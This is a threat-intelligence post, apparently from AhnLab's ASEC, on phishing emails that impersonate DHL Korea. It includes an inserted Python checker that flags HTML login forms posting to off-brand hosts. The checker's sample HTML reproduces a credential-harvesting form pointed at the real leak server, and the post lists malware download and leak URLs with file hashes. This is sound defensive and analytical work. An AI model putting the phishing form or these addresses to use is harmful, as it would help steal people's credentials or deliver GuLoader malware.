Emails Impersonating Shipping Companies Distributed as ‘Guide on Submitting Import Clearance Info’

ASEC (AhnLab Security Emergency response Center) has recently discovered malicious emails impersonating shipping companies being distributed in Korea. The emails, sent under the subject ‘Submitting import clearance info’, prompt users to open the attached file. Considering that the attached HTML’s filename starts with ‘DHL_Korea’, it can be concluded that the email is being distributed to Korean targets.

Figure 1. Original email

This disguised email carries a login page inside the attached HTML file. When a user logs in on this page, an Excel file uploaded to a personal OneDrive cloud storage account is opened.

Figure 2. Login screen disguised as a shipping company’s page

When a user opens the attached HTML, the login page it displays sends the password they enter to the server below.

Figure 3. Information leak address in the HTML web source

  • Information leak address: hxxps://lucent-fittings.000webhostapp[.]com/action.php

Figure 4. Excel file that is connected through the OneDrive link

After the user attempts to log in, they are directed to an Excel file uploaded to a personal OneDrive cloud storage account. However, the Excel file behind the link cannot be opened because it exceeds the file size limit. The screen that leads to the Excel file was designed to deceive users, making it difficult for them to realize immediately that they were phished after entering their account credentials.
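The attachment described above is a standalone HTML file whose login form posts credentials to a server unrelated to the impersonated shipping company. The following is an added example (not code from the post or from AhnLab) of a triage check that scans such an HTML attachment for forms that contain a password field and post to a host outside the brand’s own domains; the sample HTML is constructed to resemble the attachment, with the leak address taken from the post’s IoC list, and the allowed brand domain list is an assumption.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample resembling the attachment described in the post: a
# "shipping company" login form whose action points at the leak address.
SAMPLE_HTML = """<html><body>
<img src="dhl_logo.png"><h2>DHL Express - Sign in to view shipment</h2>
<form method="post" action="https://lucent-fittings.000webhostapp.com/action.php">
  <input type="email" name="email" placeholder="Email">
  <input type="password" name="pass" placeholder="Password">
  <input type="submit" value="View Document">
</form>
</body></html>"""

class FormScanner(HTMLParser):
    """Collect every <form>, its action URL, and whether it has a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None \
                and (a.get("type") or "").lower() == "password":
            self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def credential_harvest_findings(html, brand_domains):
    """Return password forms whose action host is not one of brand_domains.
    An empty or relative action (host "") in a standalone attachment is
    also reported, since a legitimate brand page would not post locally."""
    scanner = FormScanner()
    scanner.feed(html)
    findings = []
    for form in scanner.forms:
        if not form["password"]:
            continue
        host = (urlparse(form["action"]).hostname or "").lower()
        if not any(host == d or host.endswith("." + d) for d in brand_domains):
            findings.append({"action": form["action"], "host": host})
    return findings

if __name__ == "__main__":
    for f in credential_harvest_findings(SAMPLE_HTML, ["dhl.com"]):
        print("suspicious credential form posting to:", f["host"] or "(local)")
```

Phishing kits that submit credentials through JavaScript (XHR/fetch) or obfuscated script rather than a plain form action will not be caught by this check alone, so it should be paired with script inspection or sandbox detonation.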

Figure 5. Original email of the customs clearance status verification request

Similar to the aforementioned ‘Submitting import clearance info’ phishing email, another email that asks for users’ customs clearance verification status was found. When the attachment is opened, a screen that makes users believe they were connected to a PDF file can be seen. The URL connected to the Open button is currently inaccessible, but it has been confirmed that the GuLoader malware was downloaded when the address could be accessed.

Figure 6. Malicious PDF which downloads additional malware (Open button)

Due to the recent distribution of phishing emails related to import clearance, users must be particularly cautious before entering their account credentials or when opening attached files. Currently, V3 products detect and block the files mentioned in this post using the following aliases.

[File Detection]

  • Phishing/HTML.FakeMS.S2082 (2023.01.19.00)
  • Trojan/PDF.Generic (2023.02.10.02)
  • Trojan/Win.GuLoader.C5379004 (2023.02.11.00)


[MD5]

  • 7739ebe59ba934f4887d70e4a4d31d6a
  • c2b8db7362020b321870e649b05f12fb
  • e49967b8d499bb593cf44026aa79871b

[URL]

  • http[:]//31[.]42[.]184[.]26/PDF[.]gz
  • https[:]//lucent-fittings[.]000webhostapp[.]com/action[.]php
